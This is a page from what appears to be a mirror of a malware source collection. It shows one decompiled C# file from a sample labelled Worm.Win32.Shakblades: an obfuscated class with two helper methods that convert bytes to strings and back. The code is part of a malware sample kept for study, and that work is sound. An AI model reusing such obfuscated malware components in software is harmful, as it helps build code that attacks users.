mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-22 11:26:11 +00:00
f2ac1ece55
add
34 lines
1.2 KiB
C#
34 lines
1.2 KiB
C#
// Decompiled with JetBrains decompiler
|
|
// Type: rzo4euwupytyapwx03g5pnbwx
|
|
// Assembly: pff4wjti, Version=6.1.7600.16385, Culture=neutral, PublicKeyToken=null
|
|
// MVID: 5406B450-382A-49C3-BEAD-27BB328AB378
|
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Worm.Win32.Shakblades.ajg-6d5fef800026555b0865a8fd9ba051fda07985211385e0bd92a5e9a77af03653.exe
|
|
|
|
using System;
|
|
using System.Text;
|
|
|
|
public static class rzo4euwupytyapwx03g5pnbwx
|
|
{
|
|
public static string trdpamic2sckcdwunnjaiq5ctjzbh44ol(byte[] B153fsulcysdl0fl1)
|
|
{
|
|
StringBuilder stringBuilder = new StringBuilder();
|
|
for (int index = 0; index < B153fsulcysdl0fl1.Length; ++index)
|
|
{
|
|
char ch = Convert.ToChar(B153fsulcysdl0fl1[index]);
|
|
stringBuilder.Append(Convert.ToString(ch));
|
|
}
|
|
return stringBuilder.ToString();
|
|
}
|
|
|
|
public static byte[] fuwrggsyeop321rci(string Tqvl4fhqiermjhlan)
|
|
{
|
|
byte[] numArray = new byte[Tqvl4fhqiermjhlan.Length];
|
|
for (int startIndex = 0; startIndex < Tqvl4fhqiermjhlan.Length; ++startIndex)
|
|
{
|
|
char ch = Convert.ToChar(Tqvl4fhqiermjhlan.Substring(startIndex, 1));
|
|
numArray[startIndex] = Convert.ToByte(ch);
|
|
}
|
|
return numArray;
|
|
}
|
|
}
|